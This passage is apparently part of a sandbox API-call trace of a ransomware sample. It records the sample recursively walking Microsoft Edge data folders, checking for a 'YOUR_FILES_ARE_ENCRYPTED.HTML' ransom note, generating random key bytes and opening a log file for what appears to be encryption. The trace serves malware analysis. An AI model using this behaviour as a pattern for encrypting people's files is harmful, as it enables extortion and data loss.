lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\*", lpFindFileData=0x19d260 | out: lpFindFileData=0x19d260*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x42eb1a2, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x42eb1a2, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x6f5c30, cFileName=".", cAlternateFileName="")) returned 0x626878 [0116.291] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19d260 | out: lpFindFileData=0x19d260*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x42eb1a2, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x42eb1a2, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x6f5c30, cFileName="..", cAlternateFileName="")) returned 1 [0116.291] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19d260 | out: lpFindFileData=0x19d260*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x42eb1a2, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x42eb1a2, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x6f5c30, cFileName="nouser1", cAlternateFileName="")) returned 1 [0116.291] StrStrIW (lpFirst="nouser1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.291] wnsprintfW (in: pszDest=0x690350, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1") returned 139 [0116.291] GetProcessHeap () returned 0x600000 [0116.291] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6a0358 [0116.291] lstrcpyW (in: lpString1=0x6a0358, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1" [0116.292] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\*" [0116.292] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\*", lpFindFileData=0x19cf4c | out: lpFindFileData=0x19cf4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x42eb1a2, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x42eb1a2, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bfc8, dwReserved1=0x311bec0, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0116.292] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19cf4c | out: lpFindFileData=0x19cf4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x42eb1a2, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x42eb1a2, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bfc8, dwReserved1=0x311bec0, cFileName="..", cAlternateFileName="")) returned 1 [0116.292] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19cf4c | out: lpFindFileData=0x19cf4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4311257, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4311257, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bfc8, dwReserved1=0x311bec0, cFileName="120712-0049", cAlternateFileName="120712~1")) returned 1 [0116.292] StrStrIW (lpFirst="120712-0049", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.292] wnsprintfW (in: pszDest=0x6a0358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049") returned 151 [0116.292] GetProcessHeap () returned 0x600000 [0116.292] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0116.293] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049" [0116.293] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\*" [0116.293] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\*", lpFindFileData=0x19cc38 | out: lpFindFileData=0x19cc38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4311257, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4311257, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x311bec8, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0116.294] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19cc38 | out: lpFindFileData=0x19cc38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4311257, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4311257, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x311bec8, cFileName="..", cAlternateFileName="")) returned 1 [0116.294] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19cc38 | out: lpFindFileData=0x19cc38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4311257, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x43374eb, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x43374eb, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x311bec8, cFileName="DBStore", cAlternateFileName="")) returned 1 [0116.294] StrStrIW (lpFirst="DBStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.294] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore") returned 159 [0116.294] GetProcessHeap () returned 0x600000 [0116.294] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30b0050 [0116.294] lstrcpyW (in: lpString1=0x30b0050, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore" [0116.294] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\*" [0116.294] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\*", lpFindFileData=0x19c924 | out: lpFindFileData=0x19c924*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4311257, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x43374eb, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x43374eb, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318d520, dwReserved1=0x318d3f0, cFileName=".", cAlternateFileName="")) returned 0x626978 [0116.295] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19c924 | out: lpFindFileData=0x19c924*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4311257, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x43374eb, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x43374eb, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318d520, dwReserved1=0x318d3f0, cFileName="..", cAlternateFileName="")) returned 1 [0116.295] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19c924 | out: lpFindFileData=0x19c924*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43374eb, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x43374eb, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4a5e718, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x318d520, dwReserved1=0x318d3f0, cFileName="edb.chk", cAlternateFileName="")) returned 1 [0116.295] StrStrIW (lpFirst="edb.chk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.295] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\edb.chk") returned 167 [0116.295] PathFindExtensionW (pszPath="edb.chk") returned=".chk" [0116.295] lstrlenW (lpString=".chk") returned 4 [0116.295] PathFindExtensionW (pszPath="edb.chk") returned=".chk" [0116.295] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19c924 | out: lpFindFileData=0x19c924*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4311257, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4311257, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4311257, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318d520, dwReserved1=0x318d3f0, cFileName="LogFiles", cAlternateFileName="")) returned 1 [0116.295] StrStrIW (lpFirst="LogFiles", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.295] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\LogFiles") returned 168 [0116.295] GetProcessHeap () returned 0x600000 [0116.295] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30c0058 [0116.297] lstrcpyW (in: lpString1=0x30c0058, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\LogFiles" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\LogFiles") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\LogFiles" [0116.297] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\LogFiles", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\LogFiles\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\LogFiles\\*" [0116.297] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\LogFiles\\*", lpFindFileData=0x19c610 | out: lpFindFileData=0x19c610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4311257, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4311257, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x43374eb, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x318d3f8, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0116.297] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19c610 | out: lpFindFileData=0x19c610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4311257, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4311257, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x43374eb, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x318d3f8, cFileName="..", cAlternateFileName="")) returned 1 [0116.297] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19c610 | out: lpFindFileData=0x19c610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4311257, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4311257, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4a5e718, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x6b4210, dwReserved1=0x318d3f8, cFileName="edb.log", cAlternateFileName="")) returned 1 [0116.297] StrStrIW (lpFirst="edb.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.297] wnsprintfW (in: pszDest=0x30c0058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\LogFiles\\edb.log") returned 176 [0116.297] PathFindExtensionW (pszPath="edb.log") returned=".log" [0116.297] lstrlenW (lpString=".log") returned 4 [0116.297] PathFindExtensionW (pszPath="edb.log") returned=".log" [0116.297] SystemFunction036 (in: RandomBuffer=0x19c5b8, RandomBufferLength=0x20 | out: RandomBuffer=0x19c5b8) returned 1 [0116.297] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\LogFiles\\edb.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\user\\default\\datastore\\data\\nouser1\\120712-0049\\dbstore\\logfiles\\edb.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0116.298] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19c5dc | out: lpFileSize=0x19c5dc*=524288) returned 1 [0116.298] GetProcessHeap () returned 0x600000 [0116.298] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32a0048 [0116.300] wsprintfW (in: param_1=0x19c4f6, param_2="%02X" | out: param_1="84") returned 2 [0116.300] wsprintfW (in: param_1=0x19c4fa, param_2="%02X" | out: param_1="C9") returned 2 [0116.300] wsprintfW (in: param_1=0x19c4fe, param_2="%02X" | out: param_1="75") returned 2 [0116.300] wsprintfW (in: param_1=0x19c502, param_2="%02X" | out: param_1="8E") returned 2 [0116.300] wsprintfW (in: param_1=0x19c506, param_2="%02X" | out: param_1="F5") returned 2 [0116.301] wsprintfW (in: param_1=0x19c50a, param_2="%02X" | out: param_1="24") returned 2 [0116.301] wsprintfW (in: param_1=0x19c50e, param_2="%02X" | out: param_1="8F") returned 2 [0116.301] wsprintfW (in: param_1=0x19c512, param_2="%02X" | out: param_1="33") returned 2 [0116.301] wsprintfW (in: param_1=0x19c516, param_2="%02X" | out: param_1="D5") returned 2 [0116.301] wsprintfW (in: param_1=0x19c51a, param_2="%02X" | out: param_1="A8") returned 2 [0116.301] wsprintfW (in: param_1=0x19c51e, param_2="%02X" | out: param_1="B6") returned 2 [0116.301] wsprintfW (in: param_1=0x19c522, param_2="%02X" | out: param_1="02") returned 2 [0116.301] wsprintfW (in: param_1=0x19c526, param_2="%02X" | out: param_1="DF") returned 2 [0116.301] wsprintfW (in: param_1=0x19c52a, param_2="%02X" | out: param_1="3B") returned 2 [0116.301] wsprintfW (in: param_1=0x19c52e, param_2="%02X" | out: param_1="AA") returned 2 [0116.301] wsprintfW (in: param_1=0x19c532, param_2="%02X" | out: param_1="E8") returned 2 [0116.301] wsprintfW (in: param_1=0x19c536, param_2="%02X" | out: param_1="CB") returned 2 [0116.301] wsprintfW (in: param_1=0x19c53a, param_2="%02X" | out: param_1="9D") returned 2 [0116.301] wsprintfW (in: param_1=0x19c53e, param_2="%02X" | out: param_1="B6") returned 2 [0116.301] wsprintfW (in: param_1=0x19c542, param_2="%02X" | out: param_1="31") returned 2 [0116.301] wsprintfW (in: param_1=0x19c546, param_2="%02X" | out: param_1="3F") returned 2 [0116.301] wsprintfW (in: param_1=0x19c54a, param_2="%02X" | out: param_1="07") returned 2 [0116.301] wsprintfW (in: param_1=0x19c54e, param_2="%02X" | out: param_1="FB") returned 2 [0116.301] wsprintfW (in: param_1=0x19c552, param_2="%02X" | out: param_1="88") returned 2 [0116.301] wsprintfW (in: param_1=0x19c556, param_2="%02X" | out: param_1="A5") returned 2 [0116.301] wsprintfW (in: param_1=0x19c55a, param_2="%02X" | out: param_1="AB") returned 2 [0116.301] wsprintfW (in: param_1=0x19c55e, param_2="%02X" | out: param_1="06") returned 2 [0116.301] wsprintfW (in: param_1=0x19c562, param_2="%02X" | out: param_1="77") returned 2 [0116.301] wsprintfW (in: param_1=0x19c566, param_2="%02X" | out: param_1="7D") returned 2 [0116.301] wsprintfW (in: param_1=0x19c56a, param_2="%02X" | out: param_1="B3") returned 2 [0116.301] wsprintfW (in: param_1=0x19c56e, param_2="%02X" | out: param_1="68") returned 2 [0116.301] wsprintfW (in: param_1=0x19c572, param_2="%02X" | out: param_1="3F") returned 2 [0116.302] lstrcpyW (in: lpString1=0x32b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\LogFiles\\edb.log" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\LogFiles\\edb.log") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\LogFiles\\edb.log" [0116.302] CreateIoCompletionPort (FileHandle=0x318, ExistingCompletionPort=0x274, CompletionKey=0x32a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0116.302] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32a0048, lpOverlapped=0x32a0048) returned 1 [0116.302] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19c610 | out: lpFindFileData=0x19c610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4311257, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4311257, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4311257, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x6b4210, dwReserved1=0x318d3f8, cFileName="edbres00001.jrs", cAlternateFileName="EDBRES~1.JRS")) returned 1 [0116.302] StrStrIW (lpFirst="edbres00001.jrs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.302] wnsprintfW (in: pszDest=0x30c0058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\LogFiles\\edbres00001.jrs") returned 184 [0116.302] PathFindExtensionW (pszPath="edbres00001.jrs") returned=".jrs" [0116.302] lstrlenW (lpString=".jrs") returned 4 [0116.302] PathFindExtensionW (pszPath="edbres00001.jrs") returned=".jrs" [0116.302] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19c610 | out: lpFindFileData=0x19c610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43374eb, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x43374eb, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x43374eb, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x6b4210, dwReserved1=0x318d3f8, cFileName="edbres00002.jrs", cAlternateFileName="EDBRES~2.JRS")) returned 1 [0116.302] StrStrIW (lpFirst="edbres00002.jrs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.302] wnsprintfW (in: pszDest=0x30c0058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\LogFiles\\edbres00002.jrs") returned 184 [0116.302] PathFindExtensionW (pszPath="edbres00002.jrs") returned=".jrs" [0116.302] lstrlenW (lpString=".jrs") returned 4 [0116.302] PathFindExtensionW (pszPath="edbres00002.jrs") returned=".jrs" [0116.302] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19c610 | out: lpFindFileData=0x19c610*(dwFileAttributes=0x2020, 